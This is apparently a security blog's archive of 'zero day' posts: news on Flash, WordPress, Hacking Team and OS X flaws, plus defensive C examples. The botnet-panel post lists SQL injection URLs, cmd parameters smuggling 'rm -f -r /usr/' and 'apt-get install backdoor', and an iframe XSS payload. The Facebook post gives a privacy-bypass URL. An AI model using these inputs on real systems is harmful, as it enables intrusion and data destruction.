Showing posts labelled zero day. Show all posts

Another Zero Day Vulnerability Found In Adobe Flash

Researchers at Trend Micro have found a zero-day exploit for the Adobe Flash plugin in the wild. The Flash zero-day affects the latest releases of Adobe Flash Player, versions 19.0.0.185 and 19.0.0.207.

According to Trend Micro, the Pawn Storm campaign is behind the attack. Targets receive spear-phishing emails carrying links to the exploit, dressed up as breaking news. Trend Micro listed the following subject lines used in the emails:

"Suicide car bomb targets NATO troop convoy Kabul"

"Syrian troops make gains as Putin defends air strikes"

"Israel launches airstrikes on targets in Gaza"

"Russia warns of response to reported US nuke buildup in Turkey, Europe"

"US military reports 75 US-trained rebels return Syria"

Affected Adobe Flash versions (table from Trend Micro)

How Can We Protect?

Trend Micro says it has reported the flaw to Adobe, but Adobe has not yet patched it. Until a fix ships, the practical mitigation is to disable the Flash plugin in the browser (or set it to click-to-play) and to be wary of unsolicited links with news-style subjects like those above.

~ Wednesday 14 October 2015 0 comments

Organizations Need To Be More Concerned About Their Security

Nothing is secure! Yes, you heard it right. Today we point to some recent hacks.

From top-of-the-range cars to airline systems, everything has been found vulnerable, many times over.

Supercar Tesla Model S Gets Hacked
Starting with the recent hack of the Tesla Model S: two researchers found vulnerabilities in the car's internal network, reached it through the dashboard, took control with software commands, and could even plant a trojan on the Model S network and remotely shut down the motor from the dashboard.

American Airlines And Sabre Systems
The same has now happened to American Airlines: Chinese hackers reportedly breached American Airlines and Sabre Systems and gained access to hundreds of airline reservations and data on thousands of hotel bookings, although no conclusive evidence has been made public yet.

Security Breach In Pentagon Computers
Another big breach was at the Pentagon: Russian hackers got into the Pentagon's unclassified email system used by about 4,000 Joint Chiefs of Staff personnel (both military and civilian), and the system was shut down for around two weeks.

Skateboards Also Compromised
Even your skateboard can be compromised. Security researchers Richo Healey and Mike Ryan developed an exploit called FacePlant that seizes control of electric skateboards over the board's Bluetooth remote link; they presented their findings at the DEF CON conference in Las Vegas.

Ashley Madison Dating Website Hacked
Ashley Madison website hacked: hackers threaten to release the data of 37 million users. Ashley Madison is an online dating site marketed for casual encounters, married dating, discreet encounters and extramarital affairs.

Hacking Team Got Hacked
Italian surveillance company Hacking Team got hacked, and 400GB of data leaked online. The company, which sells spying tools to government and law enforcement agencies, was breached and 400GB of internal documents, source code and emails were published.

~ Monday 10 August 2015 0 comments

KdExploitMe: A Kernel Driver To Practice Writing Exploits


KdExploitMe: A kernel driver to practice writing exploits against, as well as some example exploits using public techniques.

The intent of this driver is to educate security testers on how memory corruption issues in Windows kernel drivers can be exploited. 

Knowing how to exploit security issues lets security testers prove that bugs are exploitable, which helps convince developers to fix them. While these techniques can be used for evil, this driver is released in the hope that you will use the knowledge for good.
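As an added example (not code from KdExploitMe), the following C models the bug class the driver exists to teach: a buffered IOCTL handler that validates a length using an attacker-controlled header field and wrap-prone arithmetic, next to a hardened version that checks the field against both a fixed maximum and the buffer length the I/O manager actually measured. The names (kd_*, ioctl_copy_payload, the demo_* helpers) and the status codes are invented for the example, and it runs in user mode.

```c
/*
 * Added example, not part of KdExploitMe: user-mode model of a classic
 * Windows kernel-driver bug. A METHOD_BUFFERED IOCTL handler receives a
 * caller-supplied buffer plus the length the I/O manager measured (in_len).
 * The bug is trusting a length field inside the buffer and adding to it
 * with arithmetic that can wrap. All names and status codes are invented.
 */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define KD_HDR_SIZE      8u
#define KD_MAX_PAYLOAD   64u

/* Header the caller places at the start of the input buffer. */
typedef struct {
    uint32_t magic;
    uint32_t payload_len;   /* attacker-controlled */
} kd_hdr;

/* NTSTATUS-like return codes (invented values). */
enum { KD_OK = 0, KD_BAD_LENGTH = 1, KD_TOO_SMALL = 2 };

/* VULNERABLE check: the 32-bit sum wraps for payload_len >= 0xFFFFFFF8,
 * so a huge length passes the "total <= max" test, and in_len (the length
 * the I/O manager validated) is never consulted at all. */
bool vuln_length_ok(uint32_t payload_len, size_t in_len)
{
    (void)in_len;
    uint32_t total = payload_len + KD_HDR_SIZE;          /* can wrap to 0 */
    return total <= KD_HDR_SIZE + KD_MAX_PAYLOAD;
}

/* HARDENED check: compare against the fixed maximum and the system-provided
 * buffer length, using only comparisons that cannot wrap. */
bool safe_length_ok(uint32_t payload_len, size_t in_len)
{
    if (in_len < KD_HDR_SIZE) return false;
    if (payload_len > KD_MAX_PAYLOAD) return false;
    return (size_t)payload_len <= in_len - KD_HDR_SIZE;
}

/* Hardened handler: copies the payload into a fixed driver buffer only after
 * the checks above pass. */
int ioctl_copy_payload(const uint8_t *in, size_t in_len,
                       uint8_t out[KD_MAX_PAYLOAD], size_t *out_len)
{
    kd_hdr h;
    if (in_len < KD_HDR_SIZE) return KD_TOO_SMALL;
    memcpy(&h, in, KD_HDR_SIZE);                 /* avoid unaligned user read */
    if (!safe_length_ok(h.payload_len, in_len)) return KD_BAD_LENGTH;
    memcpy(out, in + KD_HDR_SIZE, h.payload_len);
    *out_len = h.payload_len;
    return KD_OK;
}

/* Well-formed request: header claims 8 payload bytes in a 16-byte buffer.
 * Returns the number of bytes copied, or -1 if rejected. */
int demo_well_formed_request(void)
{
    uint8_t in[16] = {0};
    uint32_t len = 8;
    memcpy(in + offsetof(kd_hdr, payload_len), &len, sizeof len);
    uint8_t out[KD_MAX_PAYLOAD];
    size_t n = 0;
    return ioctl_copy_payload(in, sizeof in, out, &n) == KD_OK ? (int)n : -1;
}

/* Lying header: claims 0xFFFFFFF8 payload bytes in the same 16-byte buffer.
 * The vulnerable check would accept it; the hardened handler rejects it. */
int demo_lying_header(void)
{
    uint8_t in[16] = {0};
    uint32_t len = 0xFFFFFFF8u;
    memcpy(in + offsetof(kd_hdr, payload_len), &len, sizeof len);
    uint8_t out[KD_MAX_PAYLOAD];
    size_t n = 0;
    return ioctl_copy_payload(in, sizeof in, out, &n);
}
```

In a real driver the vulnerable version would hand the wrapped length to RtlCopyMemory and overflow the destination, which is exactly the kind of primitive the practice exploits build on; the hardened version never performs arithmetic on the untrusted field.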

Download

~ Thursday 6 August 2015 0 comments

Microsoft Announced To Increase the Bug Bounty Rewards Up To $100,000

Good news for bug hunters!

On Wednesday, at the Black Hat USA 2015 conference, Microsoft announced an increase in its bug bounty rewards. Microsoft is also running a contest at Black Hat in Las Vegas on 5-6 August 2015.


Raising the Bounty for Defense from $50,000 USD to $100,000 USD
  • Brings defense up on par with offense
  • Rewards the novel defender equally for their research
This continued evolution includes a new approach to the Online Services Bug Bounty Program:

Authentication vulnerabilities will receive double bounty payouts
  • Microsoft Account (MSA) and Azure Active Directory (AAD) vulnerabilities
  • Bonus period will run from August 5, 2015 - October 5, 2015
  • All payouts during this period will receive twice the normal payout (that means we will pay $30,000 USD for a great Authentication vulnerability!)
MSA contest at Black Hat
  • Come show us your 1337 skills and win an Xbox One, Surface 3, or one year of full MSDN access.
  • Come visit us at the Microsoft Networking Lounge, August 5-6, in Mandalay Bay to review full rules and to participate.
RemoteApp
  • RemoteApp lets users run Windows apps hosted in Azure anywhere, and on a variety of devices.
  • RemoteApp is being added as a new property of the Online Services Bug Bounty Program and all of the regular terms and payout rules apply.

A few days ago Microsoft fixed Windows 10 bugs after the official release.


Source: Microsoft 

~ 0 comments

Smashing The Browser: From Vulnerability Discovery To Exploit Development

Part 1: Browser Fuzzing Technology

This part will first introduce a fuzzer framework (StateFuzzer) developed by myself as well as the fuzzing strategies behind it, then conclude with some effective fuzzing ideas and related vulnerabilities based on results of the fuzzer.

Part 2: Advanced Browser Exploitation Techniques

This part will first briefly introduce the security model of modern browsers as well as the combat between exploit and mitigation. Then it will introduce all kinds of heap management mechanisms and their defects, together with some exploit-friendly data structures of Google Chrome and IE 11. After that, it will analyze the advanced exploitation techniques of these two browsers, including two new exploitation techniques, one of which is not limited by the sandbox (demo). Finally it will conclude with the dilemmas of Address Space Layout Randomization (ASLR), Data Execution Prevention (DEP) and the sandbox.

Part 3: IE 11 0day Exploit Development

After taking one of my IE 11 UAF vulnerabilities from StateFuzzer, I will share the whole exploit developing experience from the vulnerability trigger to arbitrary code execution, together with all related technologies and skills (Demo).

At last, I will bring a special, interesting and undisclosed IE 11 0day (not affected by isolated heap and protected free).

Download


~ Saturday 25 July 2015 0 comments

Security Hole in Apple OS X: Privilege Escalation Bug Found

Privilege escalation bug in Apple OS X found by security researcher Stefan Esser.

Esser said the vulnerability is present in both the current 10.10.4 (Yosemite) release of OS X and the current beta of 10.10.5.

Significantly, the current beta of 10.11 is free of the flaw, a sign that Apple's engineers may already be aware of the vulnerability. It would not be surprising for the fix to find its way into an incremental update to OS X in the coming weeks.

It is the type of security hole attackers regularly exploit to bypass the protections built into modern operating systems and applications: a set-uid root binary honouring an attacker-controlled environment variable.

Esser explained in the blog post,

When Apple changed the dynamic linker code for OS X 10.10 to support the new DYLD_PRINT_TO_FILE environment variable they added the following code directly to the _main function of dyld. As you can see from this code the value of the environment variable is directly used as filename for the opened or created logging file.

const char* loggingPath = _simple_getenv(envp, "DYLD_PRINT_TO_FILE");   // raw environment lookup, no restricted-process check
if ( loggingPath != NULL ) {
        // open() runs with the credentials of the process being loaded: root for a set-uid root binary
        int fd = open(loggingPath, O_WRONLY | O_CREAT | O_APPEND, 0644);
        if ( fd != -1 ) {
                sLogfile = fd;        // descriptor stays open and is inherited by any child the binary spawns
                sLogToFile = true;
        }
        else {
                dyld::log("dyld: could not open DYLD_PRINT_TO_FILE='%s', errno=%d\n", loggingPath, errno);
        }
}


The problem with this code is that it does not come with any safeguards that are required when adding new environment variables to the dynamic linker. Normally for security reasons the dynamic linker should reject all environment variables passed to it in case of restricted files. This is automatically handled when new environment variables are added to the process DyldEnvironmentVariable() function. However in the DYLD_PRINT_TO_FILE case the code was directly added to the _main function of dyld.
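The following C is an added example, not dyld's or SUIDGuard's code. It models the safeguard the analysis above says was skipped: a raw environment lookup like the one in _main, beside a lookup that ignores DYLD_ variables when the process is restricted (dyld derives that from the set-uid/set-gid status of the binary; here the caller passes a `restricted` flag), plus the prefix rewrite SUIDGuard applies. The function names are assumptions.

```c
/*
 * Added example, not dyld or SUIDGuard code: user-space model of the
 * environment-variable safeguard that DYLD_PRINT_TO_FILE bypassed.
 * dyld's real restricted-process decision comes from the binary's
 * set-uid/set-gid bits; here it is a caller-supplied flag.
 */
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Vulnerable lookup (mirrors the quoted _main code): any entry named
 * `name` is honoured, whether or not the process is restricted. */
const char *getenv_unsafe(const char *const envp[], const char *name)
{
    size_t n = strlen(name);
    for (size_t i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], name, n) == 0 && envp[i][n] == '=')
            return envp[i] + n + 1;
    return NULL;
}

/* Hardened lookup: DYLD_* variables are ignored for restricted processes,
 * which is what routing the new variable through dyld's normal
 * environment-variable processing would have done. */
const char *getenv_dyld(const char *const envp[], const char *name,
                        bool restricted)
{
    if (restricted && strncmp(name, "DYLD_", 5) == 0)
        return NULL;
    return getenv_unsafe(envp, name);
}

/* SUIDGuard-style mitigation applied before dyld runs for a SUID/SGID root
 * binary: rewrite the "DYLD_" prefix to "XYLD_" in place so the dynamic
 * linker recognises none of them. Returns the number of entries rewritten. */
int scrub_dyld_env(char *const envp[])
{
    int n = 0;
    for (size_t i = 0; envp[i] != NULL; i++)
        if (strncmp(envp[i], "DYLD_", 5) == 0) { envp[i][0] = 'X'; n++; }
    return n;
}
```

The check in getenv_dyld is the one dyld normally performs for its own variables; the scrub is the belt-and-braces approach of a kernel-side guard that cannot change dyld itself.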


How can we protect?

Before going into the exploitation of this problem please be reminded that because it will likely take months for Apple to react to this issue we released a kernel extension that protects from this vulnerability by stopping all DYLD_ environment variables from being recognized by the dynamic linker for SUID root binaries. In addition to that it adds a mitigation against a common trick to circumvent O_APPEND restrictions on file descriptors.

If you want to fix this vulnerability before Apple's update, you can: Esser has published a mitigation on GitHub.

SUIDGuard - A kernel extension adding mitigations to protect SUID/SGID binaries

SUIDGuard is a TrustedBSD kernel driver that implements several mitigations to protect against weaknesses usually involving SUID/SGID binaries.

  • Protects SUID/SGID root binaries from DYLD_ environment variables by overwriting the string DYLD_ with XYLD_
  • Protects the O_APPEND flag usually used when opening e.g. logfiles from being disabled by someone with credentials that are different from those used to open the file
  • Tested with OS X Yosemite 10.10.4.
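As an added example, not taken from Esser's write-up or from SUIDGuard, this C demonstrates the common O_APPEND trick that SUIDGuard's second mitigation targets. O_APPEND lives on the open file description, so any process holding the descriptor can clear it with fcntl(F_SETFL), after which a seek and write overwrite the head of the file. A descriptor that a set-uid program opened as root and left open across exec is therefore fully writable by an unprivileged child. The function runs against a temporary file in /tmp; its name is an assumption.

```c
/*
 * Added example (not from Esser or SUIDGuard): shows why an O_APPEND
 * descriptor is no protection once an untrusted process holds it.
 * Returns a bitmask: 1 = the seek was ignored while O_APPEND was set,
 * 2 = after clearing O_APPEND the write overwrote the file head.
 * A normal run returns 3; -1 signals an I/O error.
 */
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int demonstrate_o_append_strip(void)
{
    char path[] = "/tmp/oappend_XXXXXX";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    close(fd);

    /* Open the way dyld opens DYLD_PRINT_TO_FILE: append-only, mode 0644. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND, 0644);
    if (fd < 0) { unlink(path); return -1; }
    int result = 0;
    if (write(fd, "original\n", 9) != 9) goto fail;

    /* With O_APPEND set the seek is ignored: "A" lands at the end. */
    lseek(fd, 0, SEEK_SET);
    if (write(fd, "A", 1) != 1) goto fail;

    /* The trick: clear O_APPEND on the open file description. Any holder of
     * the descriptor may do this, whatever credentials opened the file. */
    int flags = fcntl(fd, F_GETFL);
    if (flags < 0 || fcntl(fd, F_SETFL, flags & ~O_APPEND) < 0) goto fail;

    /* Now the seek is honoured and the write clobbers the file head. */
    lseek(fd, 0, SEEK_SET);
    if (write(fd, "pwned!!!", 8) != 8) goto fail;
    close(fd);

    /* Read the file back and check both observations. */
    char buf[32] = {0};
    int rfd = open(path, O_RDONLY);
    ssize_t n = rfd < 0 ? -1 : read(rfd, buf, sizeof buf - 1);
    if (rfd >= 0) close(rfd);
    unlink(path);
    if (n != 10) return -1;                 /* "original\nA" is 10 bytes */
    if (buf[9] == 'A') result |= 1;         /* first write appended */
    if (memcmp(buf, "pwned!!!", 8) == 0) result |= 2;   /* second overwrote */
    return result;

fail:
    close(fd);
    unlink(path);
    return -1;
}
```

This is why a user-space fix cannot rely on O_APPEND alone: SUIDGuard's mitigation sits in the kernel and refuses the F_SETFL that clears O_APPEND when the caller's credentials differ from those that opened the file.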



~ Thursday 23 July 2015 0 comments

Firefox Blocks Adobe Flash Player Plugin Due To Unpatched 3rd Zero Day Vulnerability

In some places users could not see videos because of the block. Exploits for these vulnerabilities were found in the data taken from Hacking Team in the breach revealed a week ago.

Adobe was expected to patch these Flash zero-days this week; in the meantime Mozilla deactivated all versions of the plugin in Firefox.

Adobe released Flash Player 18.0.0.209 today, which fixes them.

In the Mozilla Statement,
"All versions of Adobe’s Flash Player plugin are currently deactivated by default, until Adobe releases an updated version to address known critical security issues."

Last week we reported Hacking Team was hacked and 400GBs Data Leaked. These zero days comes out from these leaks.

In the Statement of Adobe,

"Security Advisory for Adobe Flash Player
Release date: July 10, 2015

Last Updated: July 12, 2015

Vulnerability identifier: APSA15-04

CVE number: CVE-2015-5122, CVE-2015-5123


Platform: Windows, Macintosh and Linux


Summary:

Critical vulnerabilities (CVE-2015-5122, CVE-2015-5123) have been identified in Adobe Flash Player 18.0.0.204 and earlier versions for Windows, Macintosh and Linux. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.  

Adobe is aware of reports that exploits targeting these vulnerabilities have been published publicly. Adobe expects to make updates available during the week of July 12, 2015."


When playing any Flash content in Firefox, the top of the browser window reads:

"Firefox has prevented the unsafe plugin 'Adobe Flash' from running on the target URL."



~ Tuesday 14 July 2015 0 comments

Italian Surveillance Company "HackingTeam" Gets Hacked, 400GBs Data Leaked Online

An Italian company that sells spying tools to government and law enforcement agencies has been hacked, and 400GB of internal documents, source code and emails have leaked.

Hacking Team is one of the most secretive companies in the world; it sells powerful surveillance tools to law enforcement and government intelligence agencies across the globe.

Yesterday its internal network was breached, and 400GB of data was copied and distributed publicly via torrents and file-sharing sites.

Despite previous denials, the leaked data shows the company sold its tools to countries including Egypt, Ethiopia, Morocco, Nigeria, Sudan, Chile, Colombia, Ecuador, Honduras, Mexico, Panama, United States, Azerbaijan, Kazakhstan, Malaysia, Mongolia, Singapore, South Korea, Thailand, Uzbekistan, Vietnam, Australia, Cyprus, Czech Republic, Germany and Hungary.

The attack was carried out by unknown hackers who posted the internal documents on various file-sharing sites, replaced the logo of Hacking Team's Twitter account with "Hacked Team", and tweeted images of the compromised data.





Regarding the breach, Hacking Team employee Christian Pozzi responded on Twitter.

Update:
1. The @HackingTeam account has been restored and the @christian_pozzi account deleted.

2. The Hacking Team website is offline:
"503 Service Temporarily Unavailable"



~ Monday 6 July 2015 0 comments

WordPress Patched Zero Day XSS Vulnerability With New 4.2.1 Security Release

WordPress 4.2.1 version is now available. This is a critical security release for all previous versions and we strongly encourage you to update your sites immediately.

A few hours ago, the WordPress team was made aware of a cross-site scripting vulnerability, which could enable commenters to compromise a site. The vulnerability was discovered by Jouko Pynnönen.

WordPress 4.2.1 has begun to roll out as an automatic background update, for sites that support those.

For more information, see the release notes or consult the list of changes.

Download WordPress 4.2.1 or venture over to Dashboard → Updates and simply click “Update Now”.

What is Cross-Site Scripting (XSS)?
XSS (in older writing sometimes abbreviated CSS, which collides with Cascading Style Sheets) is a very common vulnerability in web applications. It allows an attacker to inject script into pages that other users' browsers then execute in the context of the site; in this case any commenter could do so. There are several types of XSS attack (stored, reflected and DOM-based).

Read more here about Cross Site Scripting with Example.
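As an added example (not WordPress code), the following C implements the output-encoding defence against the stored XSS described above: the five HTML-significant characters are escaped before untrusted comment text is placed in a page, so a commenter cannot inject markup. The function names are assumptions; the behaviour mirrors PHP's htmlspecialchars with ENT_QUOTES.

```c
/*
 * Added example, not WordPress code: HTML output encoding for untrusted
 * text (comment bodies, author names) rendered into an HTML element.
 * Escapes & < > " ' so the text cannot open a tag or break out of an
 * attribute value. Function names are invented for the example.
 */
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Entity for one character, or NULL if it may be emitted raw. */
static const char *entity_for(char c)
{
    switch (c) {
    case '&':  return "&amp;";
    case '<':  return "&lt;";
    case '>':  return "&gt;";
    case '"':  return "&quot;";
    case '\'': return "&#39;";
    default:   return NULL;
    }
}

/* Returns a newly allocated escaped copy (caller frees), or NULL on OOM. */
char *html_escape(const char *s)
{
    /* First pass: measure, so the output is sized exactly. */
    size_t out_len = 0;
    for (const char *p = s; *p; p++) {
        const char *e = entity_for(*p);
        out_len += e ? strlen(e) : 1;
    }
    char *out = malloc(out_len + 1);
    if (!out) return NULL;

    /* Second pass: copy, substituting entities. */
    char *q = out;
    for (const char *p = s; *p; p++) {
        const char *e = entity_for(*p);
        if (e) { size_t l = strlen(e); memcpy(q, e, l); q += l; }
        else   { *q++ = *p; }
    }
    *q = '\0';
    return out;
}

/* 1 if the string contains a character that must not be emitted raw. */
int needs_escaping(const char *s)
{
    return strpbrk(s, "&<>\"'") != NULL;
}
```

Encoding belongs at the point of output and must match the context (element body versus attribute versus script); this function covers the first two, which is where a comment body is normally rendered.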

Users who cannot update immediately can temporarily disable comments until the patch has been applied.

Source: Wordpress

~ Monday 27 April 2015 0 comments

Oops! Google Chrome Tab Can Crash By Simple 13 Characters On Mac OS

Windows, Safari and Android browsers are not affected by these characters (which appear to be Assyrian/Syriac script). If your Chrome is crashing, type chrome://crashes into the location bar and press Enter to view the list of crashes.


What steps will reproduce the problem?
1. Any page with

will crash the chrome tab on a Mac.

2. Just create any dummy page with the unicode characters, and the Mac Chrome tab will crash hard

What is the expected result?
Expect it not to crash

What happens instead?
It crashes

Bug reporter said,
"This is pretty serious. You could imagine someone spamming this message in hangouts/gmail and just straight-up force crashing all Mac Chrome browsers. Someone could post this on Facebook, and force-crash all Mac Chrome browers that saw it."

You can check Bug details here.

Warning: open it at your own risk. If you are using Chrome on a Mac, it may crash.

This bug is not fixed yet. We hope Google will fix it in the next update.

~ Sunday 22 March 2015 0 comments

Exploit - Several Botnet(s) Vulnerabilities

Botnets are mostly created by skilled scripters, but some of them really lack security!
A recent report posted to siph0n.in by abdilo and asterea (@4sterea) identified how insecure the most recent botnet panels are.

Let's give a look into it!

(1) botnet is vulnerable to a shell upload vulnerability:


iBanking
=============

Type: Shell Upload

Sh3ll: *(2)


(18) botnets are vulnerable to SQL injection:


 Random panel
==========

Type: SQLi
Vuln: http://site.com/g.php?id=1


 Athena
==========

Type: SQLi
Vuln: http://localhost:8992/panel/gate.php?botid=1&newbot=1&country=AUD&country_code=AUD&ip=10.0.0.1&os=win&cpu=amd&type=mate&cores=1999&version=88.8&net=wlan&admin=narwals&busy=no&lastseen=now


Casinoloader
==========

Type: SQLi
Vuln: http://localhost/gateway.php

POSTDATA page=1&val=1


 Citadel
==========

Type: SQLi
Vuln: http://localhost/cp.php?bots=1


 DLOADER
=============

Type: SQLi
Vuln1: http://localhost/includes/get_kktocc.php?line=1              
Vuln2: http://localhost/includes/update_url.php?fid=1


HERPES
=============

SQL injection.

http://localhost/tasks.php POST: vote=1&submitted=1


JACKPOS
=============

blindsqli after you login, pretty useless so i wont bother.


JHTTP
=============

Some sqlinjection vulnerabilities past the assets folder.


SAKURA
=============

Type: SQLi

http://localhost/func.php?showtopic=2
http://localhost/index.php?showtopic=322
http://localhost/sakuraadmin44.php?filename=1.png&cmd=rm%20-f%20-r%20%2Fusr%2F&edit=2312
http://localhost/sakuraadmin44.php?filename=1.png&cmd=apt-get%20install%20backdoor
http://localhost/sakuraadmin44.php?link=http%3A%2F%2Fmetasploit.com%2F&threads=10
http://localhost/showthread.php?t=123
http://localhost/showthread.php?t=23&cmd=32

Type: SQLi - POST

http://localhost/sakuraadmin44.php?threads=222&link=21213.com POST: exploits=992.ds
http://localhost/sakuraadmin44.php?threads=11 POST: snick=123&file=321&exploits=123
http://localhost/sakuraadmin44.php?threads=21 POST: snick=1


SILENCE WINLOCKER V5.0
=================

SQL injection.

http://localhost/forma.php?pin=4322
http://localhost/index.php?x=1&act=delete&id=1
http://localhost/picture.php?pin=8787
http://localhost/tmp/get.php?pin=1334


SMOKE LOADER
=============

Type: SQLi

http://localhost/control.php?id=1
http://localhost/guest.php?id=1

POST


SOLARBOT
=============

SQL injection.

localhost/index.php POSTDATA i=1881&p=80&u=8302&h=282&s=AUD


SPY-EYE
=============

Type: SQLi

http://localhost/frm_boa-grabber_sub.php?dt=11%2F11%2F1998


TINBA
=============

Type: SQLi

\tinybanker panel\admin/control/logs.act.php http://localhost/logs.act.php Post Data: bot_uid=1&botcomment=mate


UMBRA
=============

Type: SQLi

Vuln: http://localhost/delete_command.php?deleteID=1


VERTEXNET
=============

There are sqlinjection vulnerabilities but the likely hood of you actually finding a way of exploiting them is low.


ZEUS AND ZEUS EVO
=============

Type: SQLi

Vuln: http://localhost/gate.php?ip=8.8.8.8


ZSKIMMER
=============

Type: SQLi

Vuln: http://localhost/process.php?xy=2


(3) botnets are vulnerable to cross-site scripting and other medium-severity issues:


CYTHOSIA BOTNET
=============

Type: Stored XSS and iFrame redirect

Click Add Task, Command: <IFRAME SRC="whateverekorlemonpartyorwhatnot.com"></IFRAME>

Then click Create Task, and finally click Tasks. Voilà!

(Credits to asterea for finding this botnet panel)


CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


PLASMA
=============

Some Cross site scripting vulns and nothing else so no use telling you about them.

They also identified (5) secure panels :-)

Here are the secure ones:


 Alin1
==========

Nothing, unless logged in.


 Betabot
==========

Nope.


 CRIMEPACK 3.1.3
============

Secure shit, like no XSS's or anything.


SMSBOT
=============

nothing interesting.


SPY POSCARDSTEALER
=============

nope its secure.

------------------------------------------------------------------------------

If you find any new vulnerability, you can contact them directly below:

Contact: asterea@exploit.im                          

Twitter: 4sterea

------------------------------------------------------------------------------

(*)1 Source:

https://siph0n.in/exploits.php?id=3528

(*)2 iBanking Sh3ll:

http://pastebin.com/Dfczctfv


About the Author :
Christian Galeone is a cyber security researcher from Italy, currently studying at ITCL Marco Polo (a vocational technical institute) in the IT programming class.
He has been acknowledged by top companies including Yahoo!, Microsoft, AT&T and Sony. He currently writes cyber security and critical tools research articles for HOC.

~ Monday 2 February 2015 0 comments

Facebook Vulnerability Allows to Video-Call Mark Zuckerberg!

Have you ever wanted to video-call the founder of Facebook?
Well, with this vulnerability it is still possible.

The vulnerability uses a GET (in-URI) parameter to bypass the video-call restrictions in Mark Zuckerberg's privacy settings; the author describes it as CSRF.

First, a definition of a CSRF vulnerability:

"A Cross-Site Request Forgery (CSRF) vulnerability is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated." (*)

Now, let's analyze it.
We start from this URL (as if we were video-calling one of our friends):

https://www.facebook.com/videocall/incall/

Once we have identified the vulnerable GET parameter, we append it as below:

https://www.facebook.com/videocall/incall/?peer_id=

After peer_id= we insert Mark Zuckerberg's user ID (which is 4).

So the complete URL looks like this:

https://www.facebook.com/videocall/incall/?peer_id=4

Facebook's security team has not yet released a fix for this bug, so the flaw remains usable against the whole social community.

Strictly speaking, what is described here is a missing server-side authorization check on the peer_id parameter rather than CSRF: the request is issued from the attacker's own authenticated session, not forged on behalf of a victim. The fix is to enforce the callee's privacy settings on the server for every peer_id, regardless of how the client built the URL.

Reference: OWASP CSRF Guide
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29_Prevention_Cheat_Sheet


About the Author :
Christian Galeone is a cyber security researcher from Italy, currently studying at ITCL Marco Polo (a vocational technical institute) in the IT programming class.
He has been acknowledged by top companies including Yahoo!, Microsoft, AT&T and Sony. He currently writes cyber security and critical tools research articles for HOC.

~ Sunday 11 January 2015 0 comments

Real Life Phishing Scenario : Zero Day google bug

A reader on my blog tried to hack my account

Now all this time I've been teaching people how to hack wireless networks, Windows machines, websites and social networking accounts. All this we did in Kali Linux. For once, I'm moving away from the operating system and narrating a real-life incident of how someone almost got my email account and password, and could have possibly infected me with a RAT (remote administration tool). He didn't really mean to hack my account, but was rather interested in making a point. So this is how it happened.



How it started

Every day, I check my Blogger dashboard to see if there are any new comments on my blog. This morning, I saw an anonymous comment (most of the comments are anonymous, so that didn't alarm me) saying that the person needed my help with something but would only contact me via mail. I couldn't give him my personal mail address, so I decided to use my website's mail instead, and sent him a message. This was his reply:



Looked fair enough. Out of curiosity I clicked the link and it took me to a Google Drive login page. Everything looked pretty convincing, and I could have easily entered my credentials into the login form, if it were not for the slightly suspicious URL. Also, it was HTTPS and Chrome verified the digital certificate to be Google's. Faking this can be assumed to be next to impossible. However, I was still cautious, considering that I run a hacking blog and it's not unlikely that a person visiting here might be good, maybe a million times better than me.

What I did

So I decided I could not just dismiss the page as phishing without trying. I entered the email abcd@gmail.com and the password lookslikephishing and pressed sign in. Now if it were a real page, it would have said incorrect password, but this page had no mechanism for verifying the form data; it just logged everything (i.e. it recorded whatever someone entered in the form) and would simply download the PDF no matter what we entered. So, after entering the bogus login data, the PDF download started. It completed successfully and I ran the PDF. The content looked genuine, and then I realized: well, what if this was a two-fold attack, first phishing, followed by infection? He could have used a FUD remote administration tool which my antivirus wouldn't be able to detect. I have Windows Defender on my Windows 8 machine, but with proper crypting, antiviruses can be evaded. So after this, I went to the white hat section of Hackforums and asked for help (everyone needs help at some time or other, and I suck at forensics and related stuff). An expert analyzed my computer thoroughly via TeamViewer, and the file was clean indeed. Meanwhile, the following mails had been sent to me.

Mails Received


He sent me some mails
He knew I found out the phishing page thing
He said he wants me to spread public awareness regarding this kind of phishing

I replied to him saying that I'm finding out and cleaning the malware he sent me (if any). He replied and said he didn't send any malware or anything.

Finally

I contacted him via FB. He turned out to be a fellow Indian and was even younger than me (I'm 17, he is 16). By this time I had finished my investigation, and the white hat expert from Hackforums didn't find anything either. I finally concluded that either there is no malware, or he's just too good. The latter is quite unlikely since he was not able to dig up my personal email address on his own. Believe me, that's really easy to do.

After having a conversation with him and doing some research on this HTTPS phishing page, I realized that it is done using a bug in Google Drive, which has been discussed on The Hacker News. I will see if I can replicate an HTTPS phishing website using this bug, and post a tutorial on how to do it. The sole intent of this post is to make people aware that phishing is a real threat, and to encourage Google to fix this bug soon. Either way, they will surely patch this bug after I write the tutorial on creating a phishing page using Google Drive, as Google won't want its users' accounts to be compromised by any random kid with a laptop who ended up on this website. Already they have applied a patch which makes carrying this out difficult; during the earlier days of this vulnerability, the URL was short and not suspicious at all, but now it's very long (see the screenshots).

Update: Google is probably not going to do anything about the issue as it is not a bug, and I'm not going to take the risk of writing anything which will bring upon me the wrath of Google (as I use Blogger for hosting and Blogger is owned by Google). Google Drive, just like Dropbox, allows hosting simple HTML sites like this phishing one. This can be abused, since some people will not know that this is a malicious document uploaded by someone and not a legit Google Drive login page, but it still is not a bug.
Hacker's message on FB
After I told the hacker on Facebook about this post, even he acknowledged that everything about this attack is perfect except the URL, which earlier used to start with Google Drive but now has a long suspicious prefix. The vulnerability has been half patched and Google will possibly patch the remaining thing soon.

~ Friday 20 June 2014 0 comments